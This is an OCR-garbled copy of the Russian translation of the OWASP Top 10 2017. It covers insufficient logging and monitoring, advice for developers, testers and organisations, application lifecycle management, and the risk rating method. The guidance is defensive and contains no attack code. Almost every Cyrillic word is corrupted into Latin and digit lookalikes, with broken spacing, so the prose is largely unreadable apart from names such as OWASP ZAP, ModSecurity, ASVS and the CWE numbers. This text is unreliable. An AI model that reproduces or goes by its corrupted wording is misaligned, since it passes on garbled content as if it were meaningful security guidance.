HHUHAeHTbl OTCyTCTBytOT MJIM JiBJlflKJTCfl He3C|DCjDeKTMBHblMM; 

• TecTHpoBaHHe Ha npoHMXHOBeHMe m cxaHMpoBaHMe MHCTpyMeHTaMM 
PAST (HanpMMep, OWASP ZAP ) He BbiAatOT npeAynpexAeHMM; 

• npmioxeHMe He MoxeT onpeAennTb, peampoBaTb hum npeAynpexAaTb 
06 aTaxax b peaiibHOM mjim iiohtm peaiibHOM BpeMeHM. 

B CMCTeMe MMeeTcn yTenxa AaHHbix, eciiM xypHaiibi pemcTpauMM m 

npeAynpexAeHMH AOCTynHbi nonb30BaTermM hjim aTaxyioLAMM (cm. 

A3:2017-Pa3rnameHne xo HcfrMneHUMajibH bix AaHHbix ). 


IlppiMepLi cuieHappieB a<raK 

CueHapuM m : OopyM oTKpbuoro npoexTa, Mcnoiib3yeMbiM HeSoiibLuoM 
KOM3HAOH, 6blJl B3J10MaH Hepe3 yH3BMMOCTb B erO no. 3jlOyMblLUJieHHMKM 
yAaiimi m BHyTpeHHHM peno3MTopMM, coAepxamuM cjieAyxjLAyx) Bepcmo 
npoAyKTa, a Taxxe Bee coAepxMMoecjDopyMa. HecMOTpn Ha B03M0XH0CTb 
BOCCTaHOBJieHMH MCTOHHMXa, OTCyTCTBMe MOHMTOpMHra, XypHaJIMpOBaHMfl 
mjim onoBeLAeHMM npHBeno k 6onee cepbe3HbiM nociieACTBMflM. l/l3-3a 
MHUMAeHTa nporpaMMHbiM npoexT c cfDopyMa 6onee He pa3BHBaeicn. 

CueHapuM N^2:3noyMbiLUJieHHMK MoxeT Mcnoiib30BaTb oahh cTaHAapTHbiM 
napoiibA-rm npoBepxM AOCTyna ko BceM yneTHbiM 3anncHM, k HexoTopbiM 
M3 hmxoh MoxeT noAOMTM. flnn ocTaiibHbix 6yAeT3aperMCTpMpoBaHa JiMiiib 
HeyAaHHan nonbiTxa BXOAa. Hepe3 HecxoiibKO AneM nonbiTxa MoxeT 
noBTopMTbCH, ho yxe c ApyrMM naponeM. 

CueHapMM N23: B xpynHOM ToproBOM ceTM MMeeTcn necoHHMua p,nn 
BHyTpeHHeroaHanM3a BpeAOHOCHbix BJioxeHMM. CpeACTBa necoHHMUbi 
oSHapyxMiiM noTeHUMaiibHO BpeAOHOCHoe no, ho hmkto He odpaman 
BHMMaHM 9\ Ha nonynaeMbie ot necoHHMUbi npeAynpexAeHMM, noxa b3iiom 
H e o6HapyXMJlM B CBM3M C MOLLieHHMHeCXMMM TpaH3aXI4MHMM no 
6aHxoBcxMM xapiaM ot cTopoHHero 6aHxa. 


KaK npeflOTBpaTMTL 

l/lcxo p,9\ M3 xpmtmhhoctm AaHHbix, xpaHMMbix MiiM o6pa6aTbiBaeMbix 
npMiioxeHMeM, HeoSxoAUMo: 

• perMCTpMpoBaTb Bee olum6xm BXOAa, AOCTyna m npoBepxM AaHHbix Ha 
CTopoHe cepBepa c yxa3aHMeM xoHTexcTa, AOCTaTOHHoro p,nn 
BbmBiieHMH noA03pMTenbHbix mjim BpeAOHOCHbix AeticTBMM, a Taxxe 
xpaHMTb mx A-nfl nocneAyioiAero aHanM3a; 

• perMCTpMpoBaTb co6biTMfl b cfiopMaTe, HaM6onee noAXOAfliAeM p,nn 
o6pa6oTXM ueHTpanM30BaHH0M cnyxSoM xypHaiiMpoBaHMn; 

• Mcnoiib30BaTb xoHTporib ueiiocTHocTM xypHaiioB ayAHTa BaxHbix 
TpaH3axuMM A-nn npeAOTBpameHMM noAMeHbi mjim yAaneHMn AaHHbix, 
HanpMMep, c noMOLAbK) AOCTynHbix Tonbxo A-na AodaBJieHMfl TaSjiMLj, 

BA; 

• MCn0Jlb30BaTb 3CjDCjDeXTMBHbie CMCTeMbl MOHMTOpMHra M 
npeAynpexAeHMH A-na CBoeBpeMeHHoro odHapyxeHMH 
noA03pMTeribHbix aomctbmm m pearMpoBaHMH Ha hmx; 

• pa3pa6oTaTb mjim yTBepAHTb pyxoBOACTBO no peampoBaHMK) Ha 
MHUMAeHTbi m ycTpaHeHMio mx nocneACTBMM, Taxoe xax NIST 800-61 
rev2 . 

CyiAecTByx)T xoMMepnecxMe m 6ecnnaTHbie CMCTeMbl 3amMTbi 
npMJioxeHMM (HanpMMep, OWASP AppSensor ). MexceTeBbie axpaHbi 
Be6-npMJioxeHMM (HanpMMep, ModSecuritv c Ha 6 oooM ocHOBHbix npaBMJi 
OWASP ModSecuritv ). a Taxxe nporpaMMbi xoppennuMM xypHanoB c 
HacTpaMBaeMbiMM naHenuMM m npeAynpexAeHMUMM. 

CCBUIKM 

OWASP 

• llpoaKTHBHafl 3amma OWASP: PeajiM3auM5q xvpHajiMpoBaHM5q 

H o6HapVXeHHfl BTOpxeHMM 

• CiaHflapT noflTBepxfleHHfl 6e3onacHOCTM npmioxeHMM 

OWASP: V8 XvpHajiMpoBaHMe m MOHmopm-ir 

• PVKOBOflCTBO OWASP no TeCTHpOBaHHK): flQflpo6Hbie KOflbl 

oluh6ok 

• flaM^Txa OWASP: XvpHannpoBaHMe 

CTOpOHHPie 

• CWE-223: OTCVTCTBi/ie perMCTpauMM mjim OTo6paxeHHfl 
AaHHbix, OTHOC^LLIMXC^ K 6e30naCHQCTH 

• CWE-778: HexoppexTHoe xvpHaAi/ipoBaHMe 
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t£fo flejiaTt pa3pa6oT^MKaM 


0 


PaspaboTaMTe m npnM@ hsimt e BocnpowSBOflWMLie MeTOflLi m 

CTaHflapTLi obecne'jeHna 6esonacHocTn 

Ann hobmhkob, a T3xxe cneijManMCTOB, yxe xopomo 3HaKOMbix c npo6neMaivm 6e3onacHOCTM Be6-npMnoxeHMM, co3AaHne 
6e3onacHoro Be6-npMnoxeHMn v\nv\ ycipaHeHMeyn3BMMOCTeM b yxe cymecTBytomeM Moxei OKa3aTbcn HenpocTOM 
3aAaneM. ripn pa6oie c 6onbi±iMM Ha6opoM npMnoxeHMM 3aAana Moxei noKa3aTbcn HeBbinonHMMOM. 

MT 06 bl nOMOHb OpraHM3ai4M5qM M pa3pa60THMKaM SKOHOMMHeCKM 3C}DC|3eKTMBHO yMeHbLUMTb pMCKM, CBfl3aHHbie c 
6e3onacHOdbK) npmioxeHMM, OWASP C03Aan MHOxecTBO 6ecnnaTHbixM o6meAQCTynHbix pecypcoB. HMxe npeAdaBneHbi 
HexoTopbie peujeHMn OWASP, no3BonnK)LAMe opraHM3auMHM co3AaBaTb 6e3onacHbie Be6-npMnoxeHMn m API. Ha 
cneAyK)LAeM cipaHMue npeAdaBneHbi AonoriHMTenbHbie pecypcbi OWASP, npeAHa3HaneHHbie unn npoBepxn 6e3onacHOdM 
npMnoxeHMM m API. 


r >| 

Tpe6oBaHMn k 
6e3onacHOdM 
npMnoxeHM a 

V_ J 

MTo6bi co3AaTb 6e3onacHoe Be6-npMnoxeHne, HeobxoAMMO CHanana pa3pa6oiaTb TpeboBaHMn k 
ero 6e3onacHOCTM. £Lnn stmx ueneM peKOMeHAveTcn Mcnonb30BaTb CTaHAapT noATBepxAeHMn 
6e3onacHOCTM npMnoxeHMM OWASP (ASVS). flpM avTCOpcMHre Mcnonb3VMTe llpMnoxeHMe no 
6e3onacHOCTM k KoHTpaKTv Ha pa3pa6oTKv no ot OWASP. npMMenaHMe: npMnoxeHMe 
npMMeHMMO k AoroBopHOMy npaBy CLUA, npoKOHcynbTMpyMTecbc kdpmctom nepeA ero 
Mcnonb30BaHMeM. 

S N 

ApxMTeKTypa 

6e3onacHOCTM 

npMnoxeHMn 

v y 

BMecTO AobaBneHMn MexaHM3M0B obecneneHMfl 6e3onacHOCTM b roTOBbie npMnoxeHMn m API 
SKOHOMMHecKM BbiroAHee BCTpaMBaTb mx Ha 3Tane pa3pa6oTKM. B KanecTBe pyKOBOAdBa npM 
pa3pa6oTKe 6e3onacHoro npMnoxeHMn c Hvnn peKOis/ieHAveTcn Mcnonb30BaTb flaivmTKM OWASP. 


f \ 

CTaHflapTHbie 

cpeflCTBa 

o6ecneHeHMfl 

6e3onacHOCTM 

V J 

CnoxHO C03AaTb HaAexHbie m npaKTMHHbie cpeAdBa obecneneHMn 6e3onacHOCTM. 
l/lcnonb30BaHMe CTaHAapTHbix cpeAdB 3HanMTenbH0 ynpoLAaeT pa3pa6oTKy 6e3onacHbix 
npMnoxeHMM m API. llpoaKTMBHan 3amMTa OWASP nBnneTcn xopolumm nocobMeivi Ann 
pa3pa6oTHMKOB, 6onee Toro, ceMnac MHorMe cjDpeMMBopKM npeAOCTaBnniOT CTaHAapTHbie 
cpeAdBa KOHTponn 6e3onacHOCTM aBTopM3apMM, 3aiAMTbi ot MexcaMTOBOM noAMeHbi 3anpocoB m 
t. n. 


/ \ 

XM3HeHHblM 

AMKJ1 

SeaonacHOM 

pa3pa6oTKM 

flnn ycoBepmeHCTBOBaHMn npouecca C03A3HMn npMnoxeHMM m API pexoMeHAyeTcn 

Mcnonb30BaTb Monenb obecneneHMn 6e3onacHOCTM no (SAMM) ot OWASP, KOTopan no3BonneT 
pa3pa6oTaTb m peanM30BaTb ivieTOAMKy obecneneHMn 6e3onacHOCTM no, noAxoA^myK) Ann 

KOHKpeTHOM OpraHM33l4MM. 

V_ s 

s' 'x 

f \ 

06yneHMe 

6e3onacHOCTM 

npMnoxeHMM 

V J 

06pa30BaienbHbiM npoeKT OWASP npenocTaBnneT MaiepManbi Ann obvneHMn pa3pa6oTHMKOB 
6e3onacHOCTM Be6-npMnoxeHMM. Ann npaKTMHecKMx 3aHnTMM Mcnonb3VMTe OWASP WebGoat, 
WebGoat.NET, OWASP NodeJS Goat, OWASP Juice Shop MnM vfl3BMMbie Beb-npMnoxeHMn 

OWASP. MTo6bi ocTaBaTbcn b xvpce, nocemaMTe KoHcbepeHUMM OWASP AppSec, TpeHMHm MnM 
cobpaHMn pemoHanbHbix oTneneHMM OWASP. 


CymecTByeT MHOxecTBO AononHMTenbHbix pecypcoB OWASP. lloceTMTe CTpaHMuv npoeKTOB OWASP , rAe Ha BKnaAKe Project 
Inventory nepenMcneHbi npoeKTbi Flagship, Labs n Incubator. EonbUJMHCTBO pecypcoB OWASP AOdynHbi Ha HaweM Bmkm, a Taxxe 
MHorne AOKyMeHTbi OWASP moxho 3aKa3aTb b 6vMaxHOM MnM aneKTpoHHOM bma©- 















































on 

qTO fleJiaTb TeCTHpOBUplKaM 


BHeflpiiTe nocTonHHoe TecTMpoBaHMH 6e3onacHocTM 
nppuioxceHPipi 

HarmcaTb 6e3onacHbm koa - BaxHO, ho e^e BaxHee noATBepAMTb npaBMJibHOCTb pearm3aunn m ncnonb30BaHMH 
pa3pa6oTaHHbix cpeACTB 3aiAMTbi. TecTMpoBaHMe 6e3onacHOCTM npM/ioxeHMH npoBOAMTCH KaK pa3 p,nn stmx uenen. 3aAana 
3Ta cnoxHan i/i KOMnneKCHan. CoBpeMeHHbie MeTOAbi pa3pa6o™/i, T3Kv\e KaK Agile m DevOps, OKa3biBaiOT CM/ibHoe 
BJiMHHMe Ha TpaAHUMOHHbie noAxoAbi h cpeACTBa, nosTOMy Mbi HacTOHTenbHO peKOMeHAyeM onpeAerimb KpmHHHOCTb 
KOMnoHeHTOB BaLUMX npmioxeHMM m noAo6paTb actxfceKTMBHbie MeTOAbi pa6oibi c hmmm. 

CoBpeMeHHbieyrpo3bi 6biCTpo3BoniouMOHMpyiOT, nosTOMy oahoto CKaHHpoBaHHH m/im neHTecia npnnoxeHHM b i~oa yxe 
HeAOdaTOHHO. CoBpeMeHHa^ pa3pa6oTKa Tpe6yeTTecTnpoBaHHH 6e3onacHocin b TeneHMe Bcero ui/iK/ia pa3pa6oTKM. 
rionpo6yHTe yjiyHWMTb npouecc nepe3 aBTOMaTH3aunio 6e3onacHOdn. Heo6xoAHMO TaKxe ynecTb exeroAHbie pacxoAbi Ha 
TecTMpoBaHMe, 3Kcnpecc-aHann3, McnpaBJieHHe, noBTopHoe TecTi/ipoBaHi/ie m pa3BepibiBaHne npmioxeHMH, noMHOxeHHbie 
Ha KO/iHHecTBO noAA©P>KHBaeMbix npnnoxeH mm. 

llepeA HananoM TecTHpoBaHMH y6eAmecb, hto npaBM/ibHO paccTaBM/iM npHopmeibi, mcxoah 
H3 MOAerm yrpo3. Ecni/i y Bac HeT moa6J"im, ee Heo6xoAHMO pa3pa6oiaTb. Mcnonb3yMTe AJifl 
3Toro CiaHnapT noATBepxneHMH 6e3onacHOCTH npmioxeHMM (ASVS) 1/1 Pvkoboactbo no 

TecTHpoBaHHio OT OWASP. He nonaraMTecb Ha HHCTpyivieHTbi BeHAopoB Arm onpeAeJieHMH 
Kpi/iTi/iHHbix KOMnoHeHTOB Baniero 6n3Heca. 


rioHMMaHi/ie 

MOflenn 

yrpo3 


/ \ 

floHMMaHi/ie 

XM3HeHH0r0 


Bbi6epme caMbm npocTOM, 6bicipbi m m tohhwm cnoco6 npoBepKM KaxAoro Tpe6oBaHHH. 
l/lcnorib3yMTe OpeMMBopK 3H3 hmm no 6e3onacHQCTH m CiaHAapT noATBepxAeHMH 
6e3onacHQCTH npMnoxeHMM ot OWASP a rm onpenenenm cjDyHKUMOHanbHbix m 
H ec|3yHKi4H0HanbHbixTpe60BaHHM k 6e3onacHOCTn, a TaKxe npoBeAeHMH KOMnneKCHbix 
HcnbuaHMM. He 3a6biBai/iTe npo cneuMariMCTOB, KOTopbie 6yAyT 3aHMMaTbCH noxHbiivm 
Cpa6aTblBaHHHMH MJ1M HeCpa6aTblBaHHHMM aBTOMaTI/NeCKI/IX HHCTpyMeHTOB. 


r~ 

OXBaT M 
TOHHOCTb 

V_ 


V- 

Heo6H3aieribHO HaHMHaTb Tecn/ipoBaib Bee noAP^A- HanHMTec caMoro BaxHoro m nocieneHHO 
pacLUMpHHTe nporpaivuviy npoBepoK, t. e. yBermHMBaMTe KormnecTBO aBTOMaTMHecKMx npoBepoK 
6e3onacHOdn m yH3BMM0CTei/i, a TaKxe KO/iMHecTBO npoBepaeMbix npi/moxeHi/m m API. U,erib - 
AOCTHHb coctohhmh, KorAa ocHOBHbie napaivieipbi 6e3onacHOCTi/i Bcex npMnoxeHMM h API 
npoBepaiOTCfl HenpepbiBHO. 

J 


umoia 
pa3pa6oTKM 


CTpaTerMM 

TecTupoBa 

HMfl 


V 


J 


IIoaxoa k TecTHpoBaHMK) 6e3onacHOdn npnnoxeHMH AonxeH cooTBeTCTBOBaTb KOMaHAe, 
npopeccaivi h HHCTpyivieHTaM, ncnonb3yeMbiM b TeneHnexn3HeHHoro AMK/ia pa3pa6oTKM no. 
l/lcnonb30BaHMe AononHmenbHbix niaroB, aianoB m npoBepoK Moxei npHBecTH k 
pa3HornacnHM, nonbiTKaM hx o6xoAa m HexenaHMio MacLUTa6npoBaTbCH. \Aiixme noAxoAHiAne 
cnoco6bi c6opa AaHHbixo 6e3onacHOdn h BHeApeHi/m mx b Bam m npoueccbi. 


/ \ 

Coo6iAaMTe o 
pe3y/ibTaTax 
npaBMiibHO 

V_ J 


HeBaxHO, HacKonbKoxopomo npoBeABHO Tecn/ipoBaHMe, ecrm Bbi He Moxeie rpaMOTHo 
coo6LAHTb o pe3ynbTaiax. flo6eMTecb AOBepnn, noKa3aB, hto Bbi noHmviaeTe npMHAMn pa6oibi 
npi/moxeHi/m. HeTKO, 6e3 xaproHM3MOB, onmume cnoco6bi h cpeHapHM aiaK. OueHme 
pearibHyio cnoxHOCTb o6HapyxeHMH h 3Kcnnyaiaunn yH3BHM0CTeH, a TaKxe cepbe3H0CTb 
nocneACTBHM. HaKOHep, coo6LAmeo pe3ynbTaiaxnccneA0BaHMH cpeACTBa mm, 
Mcnonb3yeMbiMM pa3pa6oTHMKaMM, He b PDF-cjDaMJiax. 
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^to nejiaTfe opraHM3 aupiaM 



BHeflpiiTe nporpaMMy obecne^eHMH 6e3onacHocTM npnjioHceHnn 
cewyac 


Be3onacHOCTb npimoxem/m 6onbLue He HBJineTcn cjDaKynbTan/iBHOM. IIoa AaB/iem/ieM perynnTopoB n pacTyLAero Koni/inecTBa aiaK 
opraHM3ai4MM AonxHbi pa3pa6aTbiBaTb3<£<£eKTMBHbie npoueccbi m cpeACTBa o6ecneHeHi/m 6e3onacHOCTM cbomx npi/moxem/m m API. 
MHon/ie opraHM3aunM CTapaiOTCfl cnpaBi/iTbcn c orpoMHbiM Koni/inecTBOM yn3BMM0CTei/i b HeBepojrmoM oSteMe KOAa yxe BbinyLAeHHbix 
npi/inoxeHMM n API. 

OWASP pexoMeHAyeT pa3pa6oTaTb nporpaMMy o6ecneHeHi/m 6e3onacHOCTi/i, HTo6bi npoaHani/ 131 /ipoBaTb i/i y/iymui/iTb 6e3onacHOCTb 
npi/inoxeHMM i/i API. 06ecneHeHi/ie 6e3onacHOCTi/i Tpe6yeT 3c|)c[)eKTi/iBHoro B3anM0Aei/iCTBi/m pa3Jii/NHbix noApa3AeneHMM opraHi/i3ai4m/i, 
BKJiKDHan ayAHTopoB, pa3pa6oTHMKOB, pyKOBOAmeneM i/i aAMMHi/iCTpaTopoB. Be3onacHOCTb AonxHa 6biTb HarrmAHOM m M3MepneM0M, 
HTo6bi moxho 6bino yBMAeTb i/i noHHTb cocTOHHMe 6e3onacHOCTM npi/moxeHi/m. CAenaMTe aKueHT Ha pa6oTax i/i pe3ynbTaTax, KOTopbie 
peanbHO ynyHiuaT 6e3onacHOCTb i/i ycTpaHHT hjim chh3ht puckm. MoAenb oGecneneHun 6e3onacHOCTi/i flO m Pvkoboactbo no 
6e3onacHQCTn npi/moxem/M aha pyKOBOAHTenen I/IB ot OWASP coAepxaT 6ojibLui/iHCTBO K/iioneBbix aKTi/iBHOCTen 1/13 cni/iCKa. 



/ \ 

1/lHTerpaunR 

6e3onacHocTM 

B 

cyiuecTBytoiAne 

npoueccbi 

\_ ) 

( \ 

06ecneHeHne 

BM3ya/ibHoro 

KOHTpOJlfl 


• OnpeAerime i/i BHeApme b cyLAecTByjoiAne npoueccbi pa3pa6oTKi/i n SKcnnyaTaunn 
Meponpi/mTi/m no 6 e 3 onacHon peann 3 aunn m kohtpojik) . CociaB pa 6 oi: MonenupoBaHi/ie vrpo 3 , 
6 e 3 onacHoe npoeKTnpoBaHne i/i aHann 3 npoeKTOB , Hani/icaHi/ie 6 e 3 onacHoro koas n ero aHann 3 , 
neHTed i/i ycTpaHeHi/ie HeAOCTaTKOB. 

• flrm AOCTnxeHnn ycnexa o6ecnenbTe HannnnesKcnepTOB b npeAMeTHon o6nacm m cnvx6 
noAAepxKn arm pa3pa6oTHMKOB v\ npoeKTHon KOMaHAbi . 


• Pa 6 oianie c MeipnKaivin. ripi/iHi/iManTe peujeHnn 06 y/iynujeHnnx n cfci/maHCHpoBaHi/m Ha 
OCHOBe MeTpMK H ASHHblX aHaJIMTI/IKM. MeTpi/ 1 KH AOJlXHbl OTpaxaTb cpeACTBa 1/1 MeTOAbl 
o 6 ecneHeHnn 6e3onacHOCTi/i, o 6 HapyxeHHbie n ycTpaHeHHbieyn3Bi/iM0CTn, noKpbiTi/ie 
npi/moxeHMfl, onncaHne ollih6ok no Ti/my n KormnecTBy n t. n. 

• AHani/131/ipym-e AaHHbie no peajii/i3ai_u/m n kohtpojiio atih noi/iCKa ochobhnx npnnnH n Lua 6 ;iOHOB 
yn3BMM0CTeM npn npoBeAeHni/i CTpaTemnecKnx n ci/iCTeMHbix yjiyHLueHi/in b KOMnaHi/m. 
yHMTbiBaMTeoujn 6 KM i/i npeAJiarai/iTe nooiApeHi/m atia npoABMxeHMn y/iynmeHHM. 
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ynpaBjieHwe )kh3h@hhlim u,mkjiom npnjic»KeHMsi 


npnnoxeHM5q othochtch k Han 6 oriee cnoxHbiM CMCTeMaM, KOTopbie n\ oah nocTOHHHO co3Aatoi m o 6 criyxMBaiOT. 
AAMMHMCTpnpoBaHMe npM/ioxeHMM Heo 6 xoAHMO nopyHaib 1/IT-cneunarmcTaM, KOTopbie 6 yAyT OTBeHaTb3a Becb mx 
xM3HeHHbiM 141/1 KJi. Mbi npeAJiaraeM Ha3HanaTb MeHeAxepoB npM/ioxeHMM, KOTopbie 6 yAyT OTBenaTb 3 a TexHMHecxMe 
acneKTbi npM/ioxeHMH Ha npoTflxeHMM ero xM3HeHHoro AMxna, HaHMHaa co c 6 opa Tpe 6 oBaHMM m 3axaHHMBa h BbiBOAOM 
ci/icieM M3 SKcnriyaTauMM, npo hto TaK nacTO 3a6biBaiOT. 

• Co 6 epme n o 6 cyAMTec 3axa3HMXOM 6M3Hec-Tpe6oBaHMH k nprnioxeHmo, Bxnx)Han o 6 ecneneHMe 
KOHcjDHAeHUMajibHOCTM, noAJinHHOCTM, uenocTHOCTM m AOCTynHOCTM Bcex MHcfDopMaunoHHbix aKTMBOB, a Taxxe 
oxMAaeMyio 6M3Hec-norMxy. 

• CocTaBbTe nepeneHb TexHMHecKMx Tpe 6 oBaHMM, Bxnronan cjDyHxuMOHanbHbie m Hec|DyHXAMOHanbHbieTpe 6 oBaHMfl 
no 6e3onacHOCTM. 

• CnnaHMpyMTe m o 6 cyAHTe 6 x>A>KeT, oxBaTbiBax>LAMM Bee acnexTbi npoexTMpoBaHMn, co3AaHMn, TecTMpoBaHMH m 
3KcnnyaTa amm, a Taxxe pa 6 oTbi no o 6 ecneneHMK) 6e3onacHOCTM. 


( \ 

Tpe6oBaHna m 
ynpaBJiemie 
pecypcaMM 

V_/ 


f N 

3anpoc 
npeflnoxeHMM 
1 / 1 3aKJiK)HeHi/ie 
KompaKTa 

V_ J 


OScyAHTe TpeSoBaHun c BHyTpeHHMMM n BHeiuHMMM pa3pa6oTHMxaMM, Bxnx)Han HopMaTMBbi n Tpe6oBaHMn Barneti 
nporpaMMbi o6ecneneHMfl 6e3onacHOCTM, HanpMMep, pexoMeHAaAMM no XM3HeHHOMy AMxny pa3pa6oTXM 110. 
OueHme BbinoiiHeHMe Bcex TexHMHecxMX Tpe6oBaHMM, BxntoHan 3Tan nnaHupoBaHun m npoexTMpoBaHMH. 

06cyAHTe Bee TexHMHecxMeTpeSoBaHMn, Bxnx)Han npoexTMpoBaHMe, 6e3onacHocTb m rapaHTMMHbie o6n3aTenbCTBa. 
Mcnonb3yMTe Lua6noHbi n xoHTponbHbie cnMcxM, HanpMMep, flpMnoxeHMe no 6e3onacHocTn k KoHTpaKTv Ha 
pa3pa6oTKv flO ot OWASP . npHMenaHue: npunoxeHne npmvieHMMo k AoroBopHOMy npaBy CLJJA, 
npoKOHcyiibTMpyMTecbc jopmctom nepeA ero ncnonb30BaHneM. 


r \ 


rinaHMpoBaHMe m 
npoeKTMpoBaHMe 


V_ J 


06cyAHTe nnaHbi m npoexTbi c pa3pa6oTHMxaMM m BHyTpeHHMMM napTHepaMM, HanpMMep, cneuManMCTaMM no 
6e3onacHocTM. 

OnpeAenme apxMTexTypy m cpeACTBa ynpaBneHMn 6e3onacHOCTbK), a Taxxe xoHTpMepbi, cooTBeTCTByx)LAne 
TpeSoBaHMnM 3aLAHTbi m oxMAaeMbiM ypoBhmM onacHOCTM. Bee sto aojixho o6ecneHMBaTbcn cneuManMCTaMM no 
6e3onacHocTM. 

YSeAHTecb, hto BnaAenep npMnoxeHMn npMHMMaeTOCTanbHbie pncxn min npeAOCTaBnneT AononHMTenbHbie 
pecypcbi. 

B xaxAOM cnpuHTe o6ecnenbTeC03AaHne 3anMceM no 6e3onacHOCTM c yxa3aHMeM orpaHMHeHMM, Ao6aBiieHHbix p,nn 
HecjDyHXAMOHaJlbJlHblX Tpe6oBaHMM. 


r '\ 


Pa3BepTbiBaHMe, 
TecTi/ipoBam/ie 
m BHeApeHMe 





• ABTOMaTM3npyMTe 6e3onacHoe pa3BepTbiBaHne npMnoxeHMn, MHTepcjDeMCOB n xom noHeHTOB, a Taxxe 
nojiyneHi/ie Heo 6 xoAHMbix pa3peweHMM. 

• llpoTecTi/ipyMTe TexHMHecxMe bo3moxhoctm m MHTerpauMK) c 1/IT-apxMTexTypoM, a Taxxe opraHM3yMTe 6n3Hec- 
TecTMpoBaHMe. 

• npoTecTkipyMTe "LUTaTHoe" m "HeLUTaTHoe" ncnonb30BaHne TexHMHecxMx m npoM3BOACTBeH h bix B03M0XH0CTeM. 

• OpraHM3yMTe TecTi/ipoBam/ie 6e3onacHOCTM b cooTBeTCTBMM c BHyTpeHHMMM npoueccaMM, Tpe 6 oBaHMHMM 
33LAMTbi m npeAnonaraeMbiM ypoBHeM onacHOCTM p,nn xaxAoro npMJioxeHMM. 

• BBeAHTe npMiioxeHMe b axcnnyaTauMK) m nepecTaHbTe Mcnoiib30BaTb CTapbie npMiioxeHMn npM 
He 06 X 0 AHM 0 CTM. 

• ComacyMTe bck) AOxyMeHTauMK), a Taxxe 6a3y AaHHbix xoHTporm M3MeHeHMM m apxMTexTypy 6e3onacHOCTM. 
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Pa6oTbi m 

KOHTpOJlb 

M3MeHeHI/IM 


V 


A 


J 


Pa6oTbi AonxHbi BxnKDHaTb b ce6n ynpaBneHMe 6e3onacHocTbK) npMiioxeHMn (HanpMMep, ynpaBiieHMe 
06 H 0 BneHMflMM). 

06paTMTe BHMMaHMe nojib30BaTeneM Ha 6e3onacHocTb, a Taxxe Hav\p,me xoMnpoMMcc MexAy npaxTMHHocTbfo m 
6e3onacHocTbK). 

CnnaHMpyMTe m npoBeAHTe MOAUcjDMxauMM, HanpMMep, nepexoA Ha HOByx) BepcMK) npMnoxeHMn MnM Mcnonb30BaHMe 
ApyrMX xoMnoHeHTOB (OC, 110 MnM 6M6nMOTex). 

06HOBMTe AOxyMeHTauMK), Bxnx)Han AOxyMeHTauMK) no xoHTponx) M3MeHeHMM, apxMTexType6e3onacHOCTM, 
aneMeHTaM ynpaBneHMn m MepaM npoTMBOAeMCTBMn, a Taxxe AOxyMeHTauMto no TexyLAMM 3aAanaM MnM npoexTaM. 
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BbIBOA M3 
SKcnnyaiauiMM 

V_ 


• Bee BaxHbie AaHHbie HeoSxoAMMO 3aapxMBMpoBaTb, a ocTanbHbie 6e3onacHO yAanMTb. 

• OcymecTBMTe 6e3onacHbiM BbiBOA npMJioxeHMM M3 axcnjiyaTauMM, BKJnonafi yAaneHMe 
HeMcnonb3yeMbix yneTHbix 3armceM, a Taxxe poneM m pa3pemeHMM. 

• YcTaHOBMTe npMnoxeHMio CTaTyc "BbiBeAeHO M3 axcnjiyaTauMM" b Bfl kohtpojib M3 MeHeHMM. 
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CTeneHb onacHOCTu y^SBHMOCTew 

MeTOAMKa oueHKM CTeneHM onacHOCTM yn3BMM0CTeM p,nn cnMCxa Ton-10 ocHOBaHa Ha MeTOAMxe oueHKM pmckob QWASP . 
flrm KaxAO m xaTeropMM yrpo3 oueHMBanMCbxapaxTepHbie p,nn CTaHAapTHoro Be6-npnnoxeHnn HeAOCTaTKM, i/icxo ah m 3 
cjDaKTopoB mx BepomHOCTM m pMCxa. 3aieM yrpo3bi rpynnMpoBanMCb no cieneHM onacHOCTM Be6-npnnoxeHHM. CnMCOx 
yn3BMM0deM oOHOBnneTcn c KaxAbiM HOBbiM BbinycKOM Ton-10, no Mepe M3MeHeHMn cpeAbi m ycnoBMM axcnnyaTauMM. 

MeTOAMKa OLieHKM pncKOB QWASP onncbiBaeT MHOxecTBO cfcaxTopoB, noMoratOLAMx opeHMTb onacHOdb oOHapyxeHHOM 
yn3BMM0CTM. Ton-10 npeAOCTaBnnemMLiJb o6o6LAeHHbie AaHHbie, a He MHc})opMauMK) o KOHKpeTHbix yn3BMM0cmx b 
peanbHbix npnnoxeHMnx m API. riosTOMy hmkto KpoMe BnaAenbija mam MeHeAxepa npMnoxeHMn He CMOxeT tohho opeHMTb 
pncKM, yrpoxaK)LAMe KOHKpeTHOMy npnnoxeHMK). TonbKO Bbi oOnaAaeie HanOonee nonHbiMM 3H3HMHMM, HToObi cyAMTb o 
kpmtmhhoctm BawMX npMnoxeHMM m AaHHbix, HanMHMM B03MOXHbixyrpo3, a Taxxe npMHUMnax paOoTbi m Mcnonb30BaHMn 
BaLUeM CMCTeMbl. 

Hama MeTOAMKa onpeAenneT Tpn cjDaKTopa BepomHOCTM HanMHMn yn3BMM0CTM (pacnpocipaHeHHOCTb, cnoxHOdb 
oOHapyxeHMn m cnoxHOdb axcnnyaTauMM) n oamh cf)aKTop ee onacHOCTM (TexHMnecxMe nocneACTBMn). YpoBeHb 
kpmtmhhoctm KaxAoro cfDaxTopa KnaccMcjDMUMpyeTcn ot 1 (hm3kmm) ao 3 (BbicoKMM) m onpeAenneTcn cneijManbHbiMM 
TepMMHaMM. PacnpocTpaHeHHOCTb, KaK npaBMno, He TpeOyeT pacneTa. CTaTMCTMnecxMe AaHHbie no pacnpocTpaHeHHOCTM, 
npeAOCTaBneHHbieopraHM3auMHMM (cm. BnaroAapHOCTM Ha CTp. 24), 6binM o6pa6oTaHbi m MHTerpMpoBaHbi b cnncoKTon-10. 
3aTeM 3tm AaHHbie 6binM oOteAMHeHbi c A^yMn APyrnMM cjDaxTopaMM BeponTHOCTM (cnoxHOCTb oOHapyxeHMn n cnoxHOCTb 
SKcnnyaTauMM) A-rm pacneTa BeponTHOCTM HanMHMn xaxAOM yn3BMM0CTM. rionyHeHHoe3HaneHne 6bino yMHOxeHO Ha 
cpeAHee 3HaneHMeTflxecTM TexHMnecxMx nocneACTBMM p,nn onpeAeTieHMn coBOxynHOM onacHOCTM KaxAoro nyHKTa cnncxa 
Ton-10 (neM Bbime pe3ynbTaT, TeM Bbime onacHOCTb). CnoxHOCTb oOHapyxeHMn m SKcnnyaTaunn, a Taxxe nocneACTBMn 
paccHMTbiBanMCb Ha ocHOBe CVE, CBH3aHHbix c xaxAOM xaTeropneM Ton-10. 

